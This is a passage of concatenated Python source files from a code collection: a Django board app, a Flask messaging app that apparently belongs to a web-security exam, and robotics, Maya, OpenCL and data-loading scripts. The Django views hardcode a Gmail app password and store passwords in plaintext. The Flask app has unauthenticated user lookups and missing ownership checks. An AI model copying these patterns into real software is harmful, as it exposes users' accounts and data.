import json_normalize\nproj_dir = os.environ[\"PROJDIR\"]\nsys.path.append(os.path.join(proj_dir, \"src\", \"dj\"))\nos.environ[\"DJANGO_SETTINGS_MODULE\"] = \"proj.settings\"\ndjango.setup()\ndef flatten_json(y):\n out = {}\n\n def flatten(x, name=''):\n if type(x) is dict:\n for a in x:\n flatten(x[a], name + a + '_')\n elif type(x) is list:\n i = 0\n for a in x:\n flatten(a, name + str(i) + '_')\n i += 1\n else:\n out[name[:-1]] = x\n\n flatten(y)\n return out\n\ndef fetch_and_flatten():\n index_keys = set()\n data_file_name = 'rapido_dataset.json'\n index_name = 'rapido_index.json'\n data_source = 'rapido'\n result_file = open(f\"{proj_dir}/{data_file_name}\", \"w\")\n from ackore.models import Policy\n events = Policy.objects.filter(plan_id='rapido_trip')\n for obj in events:\n in_json = {\n \"id\": obj.data.get('id'),\n \"user_id\": obj.data.get('user_id'),\n \"name\" : obj.data.get('name'),\n \"phone\" : obj.data.get('phone'),\n \"city\" : obj.data.get('city'),\n \"email\" : obj.data.get('email'),\n \"driver_id\" : obj.data.get('driver_id'),\n \"dl_number\" : obj.data.get('dl_number'),\n \"vehicle_number\" : obj.data.get('vehicle_number'),\n \"extra\" : obj.data.get('extra'),\n \"cancelled\" : obj.data.get('cancelled'),\n \"timestamp\": str(obj.created_on)[:10]+'T'+str(obj.created_on)[11:19]+'.000Z',\n }\n flat_json = flatten_json(in_json)\n out_json = {}\n for key, value in flat_json.items():\n if value != \"\":\n value = f\"{value}\"\n flat_json[key] = value\n out_json[key] = value\n index_keys.add(key)\n out_json = json.dumps(out_json)\n result_file.write(f\"{out_json}\\n\")\n print(out_json)\n keys = list(keys)\n create_index(keys, data_source, index_name, data_file_name)\n\ndef create_index(keys, data_source, index_name, data_file_name):\n index = {\n \"type\": \"index\",\n \"spec\": {\n \"dataSchema\": {\n \"dataSource\": data_source,\n \"parser\": {\n \"type\": \"string\",\n \"parseSpec\": {\n \"format\": \"json\",\n \"dimensionsSpec\": {\n \"dimensions\": keys\n },\n \"timestampSpec\": {\n \"column\": \"timestamp\",\n \"format\": \"iso\"\n }\n }\n },\n \"metricsSpec\": [],\n \"granularitySpec\": {\n \"type\": \"uniform\",\n \"segmentGranularity\": \"day\",\n \"queryGranularity\": \"none\",\n \"intervals\": [\"2015-01-01/2020-12-30\"],\n \"rollup\": False\n }\n },\n \"ioConfig\": {\n \"type\": \"index\",\n \"firehose\": {\n \"type\": \"local\",\n \"baseDir\": \"quickstart/\",\n \"filter\": data_file_name\n },\n \"appendToExisting\": False\n },\n \"tuningConfig\": {\n \"type\": \"index\",\n \"targetPartitionSize\": 5000000,\n \"maxRowsInMemory\": 25000,\n \"forceExtendableShardSpecs\": True\n }\n }\n }\n json.dump(index, open(index_name, 'w'), indent=4)\n\n\n","sub_path":"load_data/rapido.py","file_name":"rapido.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"347796899","text":"# -*- coding: UTF-8 -*-\n\nimport string,xbmcgui\nfrom resources.lib.modules import control\n\n\nAddon = control.Addon\naddon = control.AddonID\naddonName = control.AddonTitle\nmoduleName = 'Log Viewer'\ncontents = ''\npath = ''\n\n\n# get actioncodes from keymap.xml\nACTION_MOVE_LEFT = 1\nACTION_MOVE_RIGHT = 2\nACTION_MOVE_UP = 3\nACTION_MOVE_DOWN = 4\nACTION_PAGE_UP = 5\nACTION_PAGE_DOWN = 6\nACTION_SELECT_ITEM = 7\n\n\nclass Viewer(xbmcgui.WindowXML):\n def __init__(self, strXMLname, strFallbackPath):\n self.previous_menu = 10\n self.back = 92\n self.page_up = 5\n self.page_down = 6\n # XML id's\n self.main_window = 1100\n self.title_box_control = 20301\n self.content_box_control = 20302\n self.list_box_control = 20303\n self.line_number_box_control = 20201\n self.scroll_bar = 20212\n\n\n def onInit(self):\n # title box\n title_box = self.getControl(self.title_box_control)\n title_box.setText(str.format('%s %s') % (addonName, moduleName))\n # content box\n content_box = self.getControl(self.content_box_control)\n content_box.setText(contents)\n # Set initial focus\n self.setFocusId(self.scroll_bar)\n\n\n def onAction(self, action):\n # non Display Button control\n if action == self.previous_menu:\n self.close()\n elif action == self.back:\n self.close()\n\n\n def onClick(self, control_id):\n if control_id == 20293:\n self.close()\n text_view(path)\n\n\n def onFocus(self, control_id):\n pass\n\n\ndef text_view(loc='', data=''):\n global contents\n global path\n contents = ''\n path = loc\n # todo, path can be a url to an internet file\n if not path and not data: return\n if path and not data:\n if 'http' in string.lower(path):\n # todo, open internet files from a url path\n control.OkDialog('Notice', 'This feature is not yet available')\n return\n # Open and read the file from path location\n temp_file = open(path, 'rb')\n contents = temp_file.read()\n temp_file.close()\n # Send contents to text display function\n elif data:\n contents = data\n if not contents:\n control.OkDialog('Notice', 'The file was empty')\n return\n contents = contents.replace(' ERROR: ', ' [COLOR red]ERROR[/COLOR]: ') \\\n .replace(' WARNING: ', ' [COLOR gold]WARNING[/COLOR]: ')\n win = Viewer('textview-skin.xml', control.addonInfo('path'))\n win.doModal()\n del win\n\n\n# To call module put the following in the addon list or context menu\n# import TextViewer\n# TextViewer.text_view('log')\n\n\n","sub_path":"script.ezclean/resources/lib/api/TextViewer.py","file_name":"TextViewer.py","file_ext":"py","file_size_in_byte":2675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599482639","text":"\"\"\"\nFile for downloading the OpenML datasets\n\"\"\"\n\nimport sys\nimport os\n# must be run from the project root so the data package\n# will be added to the path\nsys.path.append(os.path.abspath('.'))\n\nfrom data.config import CONFIG\nfrom data.io import write_dataset\n\n\nimport pickle\nimport pandas as pd\n\nimport openml\nfrom openml.exceptions import OpenMLServerError, PyOpenMLError\nfrom requests.exceptions import ChunkedEncodingError\nfrom arff import BadNominalValue\n\nCHECKPOINT_ITERS = 25\n\n\ndef get_dataset_ids():\n \"\"\"Get the ids of the dotasets to download\"\"\"\n dataset_metadata = openml.datasets.list_datasets()\n metadata_df = pd.DataFrame.from_dict(dataset_metadata, orient='index')\n filtered_df = metadata_df[metadata_df.NumberOfInstancesWithMissingValues == 0]\n return filtered_df.did.values\n \n \ndef download_datasets(dataset_ids, start_iteration=0, verbose=False):\n \"\"\"Download the datasets that correspond to all of the give IDs\"\"\"\n num_datasets = len(dataset_ids)\n good_dataset_ids = []\n bad_dataset_ids = []\n exceptions = []\n \n # load previous saved values of above variables\n info_filename = get_info_filename()\n if os.path.isfile(info_filename):\n if verbose: print('Loading download info from file')\n with open(info_filename, 'rb') as f:\n info = pickle.load(f)\n start_iteration = info['iteration']\n good_dataset_ids = info['good_dataset_ids']\n bad_dataset_ids = info['bad_dataset_ids']\n exceptions = info['exceptions']\n\n # loop through dataset_ids and download corresponding datasets\n for i in range(start_iteration, num_datasets):\n dataset_id = dataset_ids[i]\n if verbose:\n print('{} of {}\\tdataset ID: {} ...' \\\n .format(i + 1, num_datasets, dataset_id), end=' ')\n # OpenML likes to throw all kinds of errors when getting datasets\n try:\n dataset_id = int(dataset_id)\n dataset = openml.datasets.get_dataset(dataset_id)\n good_dataset_ids.append(dataset_id)\n write_dataset(dataset_id, dataset)\n if verbose: print('Success')\n # except (OpenMLServerError, PyOpenMLError, ChunkedEncodingError,\n # BadNominalValue, EOFError) as e:\n except Exception as e:\n bad_dataset_ids.append(dataset_id)\n exceptions.append(e)\n if verbose: print('Failure', repr(e))\n # checkpoint info\n if (i + 1) % CHECKPOINT_ITERS == 0:\n if verbose:\n print('Reached iteration {}. Writing download info' \\\n .format(i + 1))\n write_download_info({\n 'iteration': i + 1,\n 'num_datasets': num_datasets,\n 'good_dataset_ids': good_dataset_ids,\n 'bad_dataset_ids': bad_dataset_ids,\n 'exceptions': exceptions\n })\n\n \ndef write_download_info(info):\n \"\"\"Write the information about the success/failure of downloading datasets\"\"\"\n filename = get_info_filename()\n with open(filename, 'wb') as f:\n pickle.dump(info, f) \n\n\ndef get_info_filename():\n \"\"\"Get location of where to write the download information\"\"\"\n return CONFIG['datasets_info']\n\n\nif __name__ == '__main__':\n download_datasets(get_dataset_ids(), verbose=True)\n","sub_path":"phases01_data_and_posteriors/data_scripts/download_datasets.py","file_name":"download_datasets.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"188482856","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom django.http import JsonResponse # JSON 응답\nfrom map.models import Point\nfrom django.forms.models import model_to_dict\n\ndef contact(request):\n if request.method == 'POST':\n email = request.POST.get('email')\n comment = request.POST.get('comment')\n # 발신자주소, 수신자주소, 메시지\n send_mail('010wodnjs@gamil.com', email, comment)\n return render(request, 'contact_success.html')\n return render(request, 'contact.html')\nimport smtplib\nfrom email.mime.text import MIMEText\ndef send_mail(from_email, to_email, msg):\n smtp = smtplib.SMTP_SSL('smtp.gmail.com', 465) # SMTP 설정\n smtp.login(from_email, 'xynzxitkbwfjngpj') # 인증정보 설정\n msg = MIMEText(msg)\n msg['Subject'] = '[문의사항]' + to_email # 제목\n msg['To'] = from_email # 수신 이메일\n smtp.sendmail(from_email, from_email, msg.as_string())\n smtp.quit()\n\ndef map_data(request):\n data = Point.objects.all()\n map_list = []\n for d in data:\n d = model_to_dict(d) # QuerySet -> Dict\n map_list.append(d)\n# dict가 아닌 자료는 항상 safe=False 옵션 사용\n return JsonResponse(map_list, safe=False)\n\ndef map(request):\n return render(request, 'map.html')\n\ndef index(request):\n return render(request, 'index.html')\n\nfrom django.http import HttpResponseRedirect\nfrom article.models import User, Article\nimport hashlib\n\ndef signup(request):\n if request.method == 'POST':\n # 회원정보 저장\n email = request.POST.get('email')\n name = request.POST.get('name')\n\n pwd = request.POST.get('pwd')\n # m = hashlib.sha256()\n # m.update( bytes(pwd, encoding = \"utf-8\") )\n # pwd = m.hexdigest()\n\n user = User(email=email, name=name, pwd=pwd)\n user.save()\n return HttpResponseRedirect('/index/')\n return render(request, 'signup.html')\n\ndef signin(request):\n if request.method == 'POST':\n # 회원정보 조회\n email = request.POST.get('email')\n pwd = request.POST.get('pwd')\n try:\n # select * from user where email=? and pwd=?\n user = User.objects.get(email=email, pwd=pwd)\n request.session['email'] = email\n return render(request, 'signin_success.html')\n except:\n return render(request, 'signin_fail.html')\n return render(request, 'signin.html')\n\ndef signout(request):\n del request.session['email'] # 개별 삭제\n request.session.flush() # 전체 삭제\n return HttpResponseRedirect('/index/')\n\ndef write(request):\n if request.method == 'POST':\n title = request.POST.get('title')\n content = request.POST.get('content')\n try:\n email = request.session['email']\n # select * from user where email = ?\n user = User.objects.get(email=email)\n # insert into article (title, content, user_id) values (?, ?, ?)\n article = Article(title=title, content=content, user=user)\n article.save()\n return render(request, 'write_success.html')\n except:\n return render(request, 'write_fail.html')\n return render(request, 'write.html')\n\ndef list(request):\n # select * from article order by id desc\n article_list = Article.objects.order_by('-id')\n context = {\n 'article_list' : article_list\n }\n return render(request, 'list.html', context)\n\ndef detail(request, id):\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n context = {\n 'article' : article\n }\n return render(request, 'detail.html', context)\n\ndef update(request, id):\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n if request.method == 'POST':\n title = request.POST.get('title')\n content = request.POST.get('content')\n try:\n # update article set title = ?, content = ? where id = ?\n article.title = title\n article.content = content\n article.save()\n return render(request, 'update_success.html')\n except:\n return render(request, 'update_fail.html')\n context = {\n 'article' : article\n }\n return render(request, 'update.html', context) \n\ndef delete(request, id):\n try:\n # select * from article where id = ?\n article = Article.objects.get(id=id)\n article.delete()\n return render(request, 'delete_success.html')\n except:\n return render(request, 'delete_fail.html')\n ","sub_path":"board/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"78308177","text":"from flask import Blueprint, render_template, request, render_template_string, current_app, flash, redirect, url_for, session\nfrom flask_login import current_user, login_user, logout_user, login_required\nfrom werkzeug.urls import url_parse\nimport re\nimport json\nimport os\nfrom datetime import datetime\nfrom uuid import uuid4\nfrom base64 import b64encode, b64decode\n\nfrom flaskr.app import db\nfrom flaskr.forms import LoginForm, RegisterForm, ModifyForm, SendMsgForm\nfrom flaskr.models import User, Message\n\nmain = Blueprint('main', __name__)\n\n@main.errorhandler(404)\ndef page_not_found(error):\n return '404 page not found', 404\n\n\n@main.route('/')\ndef home():\n return render_template('pages/index.html')\n\n# Terms and Conditions\n@main.route('/terms', methods=[\"GET\"])\ndef terms():\n return render_template('pages/terms.html')\n\n@main.route('/robots.txt')\ndef robots():\n resp = make_response('''\nUser-agent: *\nDisallow: /whois\n''')\n resp.mimetype = \"text/plain\"\n return resp\n\n@main.route('/whois', methods=[\"GET\"])\ndef who_is():\n target = None\n if 'id' in request.args:\n try:\n target = int(request.args['id'])\n except:\n return \"400 Bad Request (id could not be cast)\"\n else:\n return \"400 Bad Request (id empty)\"\n\n if target is not None:\n User.query.all()\n user = User.query.filter_by(id=target).first()\n if user is None:\n return '404 Not Found', 404\n else:\n return user.user_name, 200\n\n# User Login\n@main.route('/login', methods=[\"POST\",\"GET\"])\ndef login():\n # Redirect Logged In Users\n if session.get('logged_in'):\n return redirect('/user')\n\n error = None\n if request.method == 'GET':\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form)\n else:\n if 'name' in request.form and 'password' in request.form:\n User.query.all()\n user = User.query.filter_by(user_name=request.form['name']).first()\n\n if user is not None:\n if user.check_password(request.form['password']):\n error = 'Password Matched'\n login_user(user)\n session['logged_in'] = True\n session['user_name'] = user.user_name\n session['user_id'] = user.id\n\n flash('Login Successful')\n return redirect('/user')\n else:\n error = 'Login Failed'\n else:\n error = 'Login Failed'\n\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form, err=error)\n else:\n form = LoginForm(request.form)\n return render_template('forms/login.html', form=form, err=True)\n\n@main.route('/logout')\ndef logout():\n logout_user()\n session['logged_in'] = False\n flash('Logout Successful')\n return redirect('/login')\n\n# User Information Functionality.\n@main.route('/user', methods=[\"GET\"])\ndef users():\n\n if not session.get('logged_in'):\n return redirect('/')\n\n form = ModifyForm()\n User.query.all()\n user = User.query.filter_by(user_name=session['user_name']).first()\n if user is not None:\n form.firstname.data = user.user_firstname\n form.lastname.data = user.user_lastname\n form.signature.data = user.user_signature\n return render_template('pages/users.html', form=form)\n\n@main.route('/user/', methods=[\"GET\", \"POST\"])\ndef users_data(userid):\n if not session.get('logged_in'):\n return redirect('/')\n\n\n name = session['user_name']\n form = ModifyForm(request.form)\n\n firstname = None\n lastname = None\n signature = None\n\n creds = {}\n if request.method == \"GET\":\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n if user is not None:\n\n if user.user_name == name:\n username = user.user_name\n mailbox = user.user_mailbox\n signature = user.user_signature\n firstname = user.user_firstname\n lastname = user.user_lastname\n\n creds.update({'User Name':username})\n creds.update({'Mailbox':mailbox})\n creds.update({'First Name':firstname})\n creds.update({'Last Name':lastname})\n creds.update({'Signature':signature})\n\n form.firstname.data = firstname\n form.lastname.data = lastname\n\n return render_template('lists/view.html', list=creds)\n\n@main.route('/modify/', methods=[\"GET\",\"POST\"])\ndef user_modify(userid):\n if not session.get('logged_in'):\n return redirect('/')\n\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n if user is not None:\n if request.method == \"GET\":\n form = ModifyForm()\n form.firstname.data = user.user_firstname\n form.lastname.data = user.user_lastname\n form.signature.data = user.user_signature\n return render_template('forms/modify.html', form=form)\n\n elif request.method == \"POST\":\n User.query.all()\n user = User.query.filter_by(id=userid).first()\n\n # Only update if we are the account owner\n if session['user_name'] == user.user_name:\n req_data = request.form['firstname']\n firstname = request.form['firstname']\n lastname = request.form['lastname']\n signature = request.form['signature']\n\n # Update the User\n user.update_user(firstname, lastname, signature)\n flash('You successfully updated your information!')\n return redirect('/user')\n else:\n return redirect('/')\n\n## Messaging Routes\n@main.route('/message/view', methods=[\"GET\"])\ndef view_messages():\n if not session.get('logged_in'):\n return redirect('/')\n\n User.query.all()\n user = User.query.filter_by(user_name=session['user_name']).first()\n mailkey = None\n if user is not None:\n mailkey = b64encode(bytes(user.user_mailbox, 'utf-8')).decode('utf-8')\n return render_template('pages/message.html', mailkey=mailkey)\n\n@main.route('/message/history', methods=[\"GET\"])\ndef show_messages():\n # Kickout Scrubs\n if not session.get('logged_in'):\n return redirect('/')\n\n\n mailbox = None\n error = None\n User.query.all()\n name = session['user_name']\n sess_user = User.query.filter_by(user_name=name).first()\n if sess_user is None:\n return '403 Permission Denied', 403\n\n\n # Bail out on non standard requests.\n if 'v' in request.args:\n try:\n mailbox = request.args['v']\n mailbox_dec = b64decode(mailbox).decode('utf-8')\n print(\"Mailbox Decoded: {}\".format(mailbox_dec))\n mailbox_owner = User.query.filter_by(user_mailbox=mailbox_dec).first()\n if mailbox_owner is None:\n return '400 Bad Request', 400\n\n if mailbox_owner.user_name != sess_user.user_name:\n return '403 Permission Denied', 403\n\n\n except:\n error = \"Cannot base64 decrypt value.\"\n return render_template('lists/history.html', err=error)\n else:\n error = \"No mailkey provided.\"\n return render_template('lists/history.html', err=error)\n\n filepath = os.path.join(current_app.config.get(\"APP_BASE_DIR\"), mailbox + \".txt\")\n fp = open(filepath, \"r\")\n\n MSG_REC_SIZE = current_app.config.get(\"MSG_REC_SIZE\")\n msg_block = fp.read(MSG_REC_SIZE)\n msg_obj = Message()\n msgs = []\n\n while len(msg_block) == MSG_REC_SIZE:\n msg_obj.reload(msg_block)\n msg_str = msg_obj.as_padded_string()\n src = msg_str[0:36]\n dst = msg_str[36:72]\n msg = msg_str[72:MSG_REC_SIZE]\n\n\n src_user = User.query.filter_by(user_mailbox=src).first()\n dst_user = User.query.filter_by(user_mailbox=dst).first()\n tmp = {}\n if src_user is not None:\n tmp.update({'src':src_user.user_name})\n tmp.update({'srcbox':src})\n else:\n tmp.update({'src':src})\n\n if dst_user is not None:\n tmp.update({'dst':dst_user.user_name})\n tmp.update({'dstbox':dst})\n else:\n tmp.update({'dst':dst})\n\n tmp.update({'msg':msg.rstrip(' ')})\n msgs.append(tmp)\n\n msg_block = fp.read(MSG_REC_SIZE)\n\n fp.close()\n\n # Generate Message Form\n form = SendMsgForm(request.form)\n return render_template('lists/history.html', msgs=msgs[::-1], form=form)\n\n@main.route('/message/send', methods=[\"POST\"])\ndef send_message():\n # Kickout Scrubs\n if not session.get('logged_in'):\n return redirect('/')\n\n name = session['user_name']\n User.query.all()\n\n src_user = User.query.filter_by(user_name=name).first()\n\n if src_user is None:\n flash(\"User mailbox not found\")\n return redirect('/')\n src_mailbox = src_user.user_mailbox\n mailkey = b64encode(bytes(str(src_mailbox), 'utf-8')).decode('utf-8')\n\n # Check target is valid\n target = request.form['mailbox']\n dst_user = User.query.filter_by(user_mailbox=target).first()\n if dst_user is None:\n flash(\"User mailbox not found\")\n return redirect('/message/history?v=' + mailkey)\n dst_mailbox = dst_user.user_mailbox\n\n message = request.form.get(\"message\", '')\n message = request.form['message']\n\n\n # Craft the message and send it.\n new_msg = Message(src_mailbox, dst_mailbox, message)\n success = new_msg.send_msg()\n if not success:\n flash(\"Message failed to send\")\n return redirect('/message/history?v=' + mailkey)\n else:\n # Success\n return redirect('/message/history?v=' + mailkey)\n\n# User Registration\n@main.route('/register', methods=[\"POST\",\"GET\"])\ndef register():\n form = RegisterForm(request.form)\n error = None\n if request.method == \"POST\":\n if 'name' in request.form and 'password' in request.form:\n User.query.all()\n user = User.query.filter_by(user_name=request.form['name']).first()\n if user is None:\n uid = uuid4()\n # Create User\n new_user = User(request.form['name'], request.form['password'], 'Alice', 'Anonymous', 'iDont Facegood, literally iDont Even. lol! #6443_EXAM_MEME', str(uid) )\n User.register_user(new_user)\n\n # Create User Mailbox\n mailbox_name = b64encode(bytes(str(uid), 'utf-8')).decode('utf-8')\n filepath = os.path.join(current_app.config.get(\"APP_BASE_DIR\"), mailbox_name + \".txt\")\n fp = open(filepath, \"wb\")\n fp.close()\n\n greeting = \"Welcome to Facegood, {}. I am Noone.\".format(new_user.user_name)\n greet_msg = Message(current_app.config.get(\"GREETER\"), str(uid), greeting)\n greet_msg.send_msg()\n\n flash('Registration Successful')\n return redirect('/login')\n # Create Pubkey File Name\n # Create Privkey File Name\n # Generate Keypair\n else:\n error = \"User already exists.\"\n\n return render_template('forms/register.html', form=form, err=error)\n\n\n","sub_path":"WYrE8ZXVWRwvAKw1dhoHew.exam.ns.agency/vpn-static/flaskr/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"552097443","text":"#!/usr/bin/env python\n#coding: utf-8\n\n################################################################################################\n## this node contains transformation algorithmes allowing interpretation of behaviors given by \n## b_s_i node and will select and modify animation given from the pose repertory in order\n## to reflect in the robot the behavior given from b_s_i node \n################################################################################################\n\nimport rospy\nfrom std_msgs.msg import String, UInt8\nimport threading\nfrom NaoMotion import *\nfrom BSI import *\n\n\n# global variable telling if the robot is busy or not\nrobotBusy = True\n\n\ndef callback_activityRobot(data):\n global robotBusy\n if str(data.data) == \"WAITING_FOR_FEEDBACK\":\n if cNaoMotion.get_posture() == \"Crouch\":\n # the robot needs to stand up in order to launch animations\n cNaoMotion.stand_init()\n cNaoMotion.start_breathing()\n\n # the robot is not busy anymore\n robotBusy = False\n\n #init CBSI time\n cBSI.init_time_interaction()\n\n # launch timer to update BSI mood\n timerUpdateBSI = rospy.Timer(rospy.Duration(periodUpdateTimerBSI), callback_updateBSI)\n\n # launch timer that will triger animations at a certain frequency given in param\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, oneshot=True)\n\n else:\n # the robot is busy (doing a task)\n robotBusy = True\n\n try:\n timerLaunchAnimation.shutdown()\n timerUpdateBSI.shutdown()\n except:\n pass\n\ndef callback_animations(data):\n\n # from the TELE_OP only\n # launch nao animation given in the topic\n cNaoMotion.launch(data.data)\n\ndef callback_poses(data):\n\n state = data.data\n\n # posture -> only use by teleOp, idle mode cannot launch the posture animation\n if state == 0:\n # go to init pose\n cNaoMotion.stand_init()\n\n elif state == 1:\n # go to crouch pose\n cNaoMotion.sit_down()\n\n elif state == 2:\n # start breathing\n cNaoMotion.start_breathing()\n\n elif state == 3:\n # stop breathing\n cNaoMotion.stop_breathing()\n\ndef callback_settings(data):\n\n global parkinson_scale\n global robotBusy\n\n state = data.data\n\n if state == 0:\n robotBusy = False\n\n if state == 1:\n # launch timer to update BSI mood\n timerUpdateBSI = rospy.Timer(rospy.Duration(periodUpdateTimerBSI), callback_updateBSI)\n\n # launch timer that will triger animations at a cerxtain frequency given in param\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, oneshot=True)\n\ndef callback_user_feedback(data):\n\n if data.data == \"+\":\n cBSI.set_mood(\"happy\")\n \n elif data.data == \"-\":\n cBSI.set_mood(\"sad\")\n\ndef callback_timer_animation(event):\n if robotBusy == False:\n cNaoMotion.launch_animation(cBSI)\n\n # update timer frequency and relaunch it\n timerLaunchAnimation = rospy.Timer(rospy.Duration(cBSI.periodAnimation), callback_timer_animation, oneshot=True)\n\ndef callback_updateBSI(event):\n cBSI.update_mood(event.current_expected, event.last_expected)\n \n\nif __name__ == \"__main__\":\n\n # create a unique node\n rospy.init_node(\"animations_manager\")\n\n # get all parameteres from launch file\n NAO_IP = rospy.get_param('~nao_ip', '10.0.0.10')\n PORT = rospy.get_param('~nao_port', \"9559\")\n # topics name\n TOPIC_ANIMATIONS = rospy.get_param('~topic_animations', 'topic_animations')\n TOPIC_ACTIVITY = rospy.get_param('~topic_activity', 'state_activity')\n TOPIC_POSES = rospy.get_param('~topic_poses', 'topic_poses')\n TOPIC_SETTINGS = rospy.get_param('~topic_settings', 'topic_settings')\n TOPIC_USER_FEEDBACK = rospy.get_param('~topic_user_feedback', 'user_feedback')\n TOPIC_NB_REPETITION = rospy.get_param('~topic_nb_repetition', 'nb_repetition')\n\n # initial frequency at which animations are launch\n periodAnimation = float(rospy.get_param('~periodAnimation', '10'))\n periodAnimationMax = float(rospy.get_param('~periodAnimationMax', '10'))\n periodUpdateTimerBSI = float(rospy.get_param('~periodUpdateTimerBSI', '0.1'))\n\n # create animation class that will launch the animations\n cNaoMotion = NaoMotion(NAO_IP, int(PORT))\n\n # create the BSI class that will contain the behavior that the robot needs to show\n cBSI = BSI(periodAnimation, periodAnimationMax)\n\n # subscribe to topics that send animations, poses and settings orders\n rospy.Subscriber(TOPIC_ANIMATIONS, UInt8, callback_animations)\n rospy.Subscriber(TOPIC_POSES, UInt8, callback_poses)\n rospy.Subscriber(TOPIC_SETTINGS, UInt8, callback_settings)\n rospy.Subscriber(TOPIC_USER_FEEDBACK, String, callback_user_feedback)\n\n # subscribe to topic regarding the state machine\n rospy.Subscriber(TOPIC_ACTIVITY, String, callback_activityRobot)\n\n # spin() simply keeps python from exiting until this node is stopped\n rospy.spin()\n\n\n\n\n\n\n\n","sub_path":"nodes/animations_manager.py","file_name":"animations_manager.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406680347","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 5/21/2019 10:28 AM\n# @Author : invincible0918@126.com\n# @Site : \n# @File : fkJointChain.py\n# @Software: PyCharm\n\n\nfrom maya import cmds as mc\nimport jointChain\nreload(jointChain)\n\n\nclass FKJointChain(jointChain.JointChain):\n def __init__(self, sourceJointRoot, skinJointRoot, controllerRoot):\n super(FKJointChain, self).__init__(sourceJointRoot, skinJointRoot, controllerRoot)\n self._controllerTypes = ['parentConstraint']\n\n @property\n def _jointChainType(self):\n return 'Fk'\n\n def _iterJoints(self, parentJoint, li):\n children = mc.listRelatives(parentJoint, c=True, f=True, type='joint')\n\n d = dict()\n d['sourceJoint'] = parentJoint\n d['attrs'] = self._getConnectAttr(parentJoint)\n d['constraints'] = self._getControllers(parentJoint)\n\n li.append(d)\n\n if children:\n for joint in children:\n self._iterJoints(joint, li)\n\n def _generateDatas(self, sourceList, destList):\n li = list()\n for i in range(len(sourceList)):\n data = dict(sourceList[i])\n data['destJoint'] = destList[i]\n li.append(data)\n\n return li\n","sub_path":"Projects/Maya/Tools/WildLifeLeg/Package/Scripts/JointChain/fkJointChain.py","file_name":"fkJointChain.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630230282","text":"# code inspired from example provided by Roger Pau Monn'e\n\nimport pyopencl as cl\nimport numpy\nimport numpy.linalg as la\nimport datetime\nfrom time import time\n\n\n# number of data\nnum_data=4*25000*128\nfragment_size= 200\nsequence = numpy.random.randint(0,20,num_data).astype(numpy.uint8)\nfragment = numpy.random.randint(0,20,fragment_size).astype(numpy.uint8)\n\n# just for test, inject fragment somewhere in sequence\nsequence[100:100+fragment_size]=fragment\nscore = numpy.empty(num_data).astype(numpy.uint16)\n\n\nctx = cl.create_some_context()\nqueue = cl.CommandQueue(ctx,\n properties=cl.command_queue_properties.PROFILING_ENABLE)\n\nmf = cl.mem_flags\n\nsequence_buf = cl.Buffer(ctx, mf.READ_ONLY, sequence.nbytes)\nfragment_buf = cl.Buffer(ctx, mf.READ_ONLY, fragment.nbytes)\nscore_buf = cl.Buffer(ctx, mf.WRITE_ONLY, score.nbytes)\ntime1 = time()\ncl.enqueue_write_buffer(queue, sequence_buf, sequence)\ncl.enqueue_write_buffer(queue, fragment_buf, fragment)\nprg = cl.Program(ctx, \"\"\"\n __kernel void scanSequence(__global const uchar *sequence,\n __global const uchar *fragment, __global ushort *score, const uint size_data, const uint fragment_size)\n {\n int gid = get_global_id(0);\n ushort s=0;\n // TODO: implement a scan of fragment in current sequence element\n if(gid+fragment_size < size_data){\n\t for(int i=0; i< fragment_size; i++){\n\t \tif(sequence[gid+i] == fragment[i])s = s+1;\n\t }\n\t score[gid]=s;\n }\n }\n \"\"\").build()\n\nexec_evt = prg.scanSequence(queue, (num_data,), None,\n sequence_buf,\n fragment_buf,\n score_buf,\n numpy.uint32(num_data),\n numpy.uint32(fragment_size))\nexec_evt.wait()\nelapsed = 1e-9*(exec_evt.profile.end - exec_evt.profile.start)\ncl.enqueue_read_buffer(queue, score_buf, score).wait()\ntime2 = time()\nexecTime2 = time2 - time1\nprint(\"Execution time of test: %g s\" % elapsed)\nprint(\"Execution time of test + memory transfert time: %g s\" % execTime2)\n\nprint (score[90:110])\n","sub_path":"opencl.py","file_name":"opencl.py","file_ext":"py","file_size_in_byte":2319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"636177541","text":"#import math\nimport numpy as np\nimport open3d as o3d\nfrom utils import matrix_dot_product\nfrom utils import pc_show\n#import utils\n'''\n当前函数中存在大量基于 相邻点坐标做差,然后求向量点乘,作为判断的阈值条件: 0.05, 0.2, 0.3。\n基于余弦定理,其实代表了两个激光点的 夹角 或者 空间距离的平方\na·b>0 方向基本相同,夹角在0°到90°之间 <--\na·b=0 正交,相互垂直 \na·b<0 方向基本相反,夹角在90°到180°之间 \n'''\nclass FeatureExtractor:\n # Number of segments to split every scan for feature detection\n N_SEGMENTS = 6\n\n # Number of less sharp points to pick from point cloud\n PICKED_NUM_LESS_SHARP = 20\n # Number of sharp points to pick from point cloud\n PICKED_NUM_SHARP = 4\n # Number of less sharp points to pick from point cloud\n PICKED_NUM_FLAT = 4\n # Threshold to split 